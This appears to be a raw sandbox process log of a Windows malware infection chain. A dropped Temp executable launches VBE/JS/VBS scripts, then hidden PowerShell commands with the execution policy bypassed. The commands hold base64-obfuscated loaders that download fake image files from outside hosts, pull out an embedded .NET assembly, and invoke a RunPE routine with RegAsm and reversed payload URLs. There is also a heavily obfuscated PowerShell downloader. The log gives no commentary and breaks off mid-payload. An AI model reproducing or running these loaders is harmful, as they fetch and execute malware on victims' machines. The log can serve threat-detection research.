C:\Users\Admin\AppData\Local\Temp\junexw.exe

"C:\Users\Admin\AppData\Local\Temp\junexw.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crrlge.vbe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jnkknt.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jnznkv.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreMwDgTrevDgTreDUDgTreNwDgTre4DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDcDgTreNgDgTre3DgTreDEDgTreODgTreDgTre0DgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBuDgTreHUDgTreagBuDgTreGUDgTrecwBhDgTreC8DgTrebQBvDgTreGMDgTreLgBpDgTreGMDgTreaQByDgTreGEDgTreawBpDgTreGMDgTreZQBrDgTreGUDgTrebDgTreBvDgTreGoDgTreZQBpDgTreHYDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5OC8wMTUvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE4Mjg0MjE2Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LndlbnlhbW52aC9sYy5zYXlvanJldmVsYy8vOnNwdHRoJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJyAsICdkZXNhdGl2YWRvJywnUmVnQXNtJywnZGVzYXRpdmFkbycpKX19';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844', 'https://uploaddeimagens.com.br/images/004/793/578/original/vbs.jpg?1717671844'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nujnesa/moc.icirakicekelojeiv//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216', 'https://uploaddeimagens.com.br/images/004/798/015/original/new_image.jpg?1718284216'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wenyamnvh/lc.sayojrevelc//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ovaloid = 1;$Pengestrkes='ring';$Mekhitarist198='S';Function Placque($Ansigtsformens){$Bantamweight=$Ansigtsformens.Length-$Ovaloid;$Sowel=$Mekhitarist198+'ubst'+$Pengestrkes;For( $Frizzle=2;$Frizzle -lt $Bantamweight;$Frizzle+=3){$Outgarment+=$Ansigtsformens.$Sowel.Invoke( $Frizzle, $Ovaloid);}$Outgarment;}function Quatrible($Pusheres){ . ($Phenylene) ($Pusheres);}$Extense=Placque 'PhMBroDiz SiBalMalGraDo/ a5 K.Kk0Te ,a(SwW JiChnU,dGeo .wBas t gNNrTM. Ve1 F0D.. U0.o;In CoW riPrnSt6O.4A.;sl U.xR,6 U4Po; . Ar evra:He1Gu2Sp1,o.Ve0Mi)Lo tjGBieSac,uk toPm/ T2 S0 o1Bi0 .0 C1,u0Li1 u .FC iForBue bfUdoMax C/ t1Pi2 C1 t. e0Po ';$Cigartndere=Placque 'CaU As aemerMo-DaApagLaeHan at , ';$Unilaterale=Placque 'A,h,etFit CpBas .: e/ o/ an SzScaHar oi a.a.SpoElrP gOu/ Bs ,xCi/AzO,yvToaSpr iKaoKisF.tNioRemHiyR . HcV sTuvS ';$Forsgscentret=Placque 'Be> P ';$Phenylene=Placque 'S,i ,eM.xGe ';$Passionfruit='Dismes';$synanons = Placque 'Fre ic eh Ho,e r% Paf.pAlpO,d maUdtUdaG %No\H KdydN,fBoaF.rStsT,2N.1Ud1Vi.ExA Pr DbGr Aa& L&Tn TeTrcSth,aoSe FotBa ';Quatrible (Placque 'Ge$pogStl AoAlb .aFolFe:DiNK y Thd.eRudTasChfGooglrKvm SiSudUblN.iIsnT,gW e rNynTaePo=b (S.c,hmNadIm Va/SecPr Ko$.rsJ y,in UaTonAno.rnBus G)F, ');Quatrible (Placque 'Un$.sg.pl no b Rar l n: Af.arBiePse,al Ha nBrcKieS.jBro ru Mrkansta ,lGai ksPrtvie KrRa= U$veUrenBai.il laTot Ae IrBeaGalAred..,tsH pHolPhiSdtBi(S $,aFamoAurVes UgStsboc eGenJatUnr Ae.ytH,) r ');Quatrible (Placque ' T[T.N Uet.tWv.TrSA.eThrTavInilucCoeQuPIno IiH,nCot MCaa enPraRegAfeStr J]N,:Ca:HiSJ,e ,c UuRer,hiByt.ly.oP.arDeoPrtK,o cK.oAklKv .k=,o F[C.NBreEntHa.TsSEde DcU,u arChiBytChyyePLir to,lt.roHacInoColBeTSeySap,xeD,]Ej:In:SoT Rl s.k1Bo2Gr ');$Unilaterale=$freelancejournalister[0];$pneumatocyst= (Placque 'Pa$BagTrlB.oF b ga ,lTe:.eH io .r TmB,oSpgReo ynUna l eTusFr= NH,eN w e- jODobKajUne CcFetP, .yS Uy.fsEmt BeBomM.. LNCle PtB . GWUde abFaC LlSkiBaeLan Kt');$pneumatocyst+=$Nyhedsformidlingerne[1];Quatrible ($pneumatocyst);Quatrible (Placque 'Br$ SHH oA r.rmWeoUtgPuog.n ,aZ lCue Ss,k.KoHGyeSmaBed HeForEksEs[ P$ChC .iHogA,a ur WtP,nCydI.eM,rLiesk]Gr= J$.eEAqx DtcueSinPesEceA ');$Vitriners=Placque '.i$ .HN.o ArAbmSpo,rgA.o MnBeaS,l KeK sSa.MeDTwo ewBen el EoRaa d.eF,oiP lVae .(Ep$HiU .nFoiFulTiaFutC e .r SaD,lSaeG ,Co$t.M aoB,nL.d ungai tKueP tVe),s ';$Mondnitet=$Nyhedsformidlingerne[0];Quatrible (Placque 'St$BagB.lReoAub Ra Sl,l:SkS .yTos it FeGemTyi .sVie HrBi= (A T KeDes ctHo-KvPAlaOrtMeh.n Vo$P M.ooMinakdBln,aiG t,aeLyt.r)Ap ');while (!$Systemiser) {Quatrible (Placque ' O$stgPelShoknb aBel i:CoRw,aUnpCos uo Dd MiSpeKar E=Ud$ Rt srKouHoeUr ') ;Quatrible $Vitriners;Quatrible (Placque 'F,S.ct SaMer.ctP.-.aSA lKoeK,eP,p V Na4di ');Quatrible (Placque 'Th$ hgfalF oUdbb,aP,lAl:FiSSty.hs EtT,e ,m oiQ s JeBerTr=Ri(ErTk,eCosgetPa-KeP.ua.nt MhF. .$NeM aoHenUdd UnFaiCltW,e Ot.r) I ') ;Quatrible (Placque 'Ve$Prg.ulSaoRyb.iaOvlD :AlDBre cvei BmenaTel lt ta Eb Eu.ilP.eCor Ce.anFrdCoe,ys T=.e$h,g .lCooDibFaaRelC,:P.UGrnFod,esCie BeAflCoiUdg FeSi+ N+Fo% $,rflar Me EeDel.eaUnn Ec.de ,j .o .uKlr.lnHoaR.l oi sEctOme.orEf.sucPuoJuuEmnTjtS. ') ;$Unilaterale=$freelancejournalister[$Decimaltabulerendes];}$Stavelsesantallets=321844;$Kopimaskine=26918;Quatrible (Placque '.n$LegKulGro GbRaaBal.a: MSHrk uM,lOvdS,e ,rKosWat,irTroH,ps Mo=Va HuGdeebytSi-.rC,eo ,n,et.beRanu.t r$B.MKyoSanAkdErnaniPat,oe ,t R ');Quatrible (Placque ' .$Blglel,uoDrbHya,pl .:SgTMei ClBehBroF e Vr,xeHi S,=St F [.iS iys.s et ,eMamVu. SCMeo .n AvEne .rUntu ]Co:Gr:FoF,irFuo m PBekaU sBeeMi6La4T.SFotF,r.niWen NgCy( t$PaSBikSnu,flQ.dHyeS rHesuntGrrSpoFepPr) c ');Quatrible (Placque ' y$AfgArlOmoStb.oaM l S:NeB aeQus at,ri FaStlC,sFl1fr0Bu5Ti Pa= kv[OmSSlyPhs BtAce,am a.FeT .eA.x Rt A.PlEBanEncOvo ,dR.i knSkgPi]Sp:Pa:T A RSS,C LI LII..EnGReeFotj.SovtvirPyi,enfagAk(Pe$ TTDyi lK,hTao FeT rCoeP ) ');Quatrible (Placque 'Me$BagaalF.oFobOcaSllGe:W KFlaDubVaeTalP lCogHjnC,i enDeg.a= R$ uBkre CsPot SiS,aGolRusKo1Te0S,5 P. ns SuRobD s ,t.er,xi SnKig (J.$B,S RtgaaArv,peB l,tsFlerasG a.en,rtInaJ.lRelToe,itArsP,,Ci$ImKNeoCepAbibam.maB,sVakEfi yn,keFo)Ep ');Quatrible $Kabellgning;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kdfars211.Arb && echo t"

C:\Users\Admin\AppData\Local\Temp\junexw.exe

"C:\Users\Admin\AppData\Local\Temp\junexw.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\zxwuch.vbe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kaqlax.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ucaxju.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgB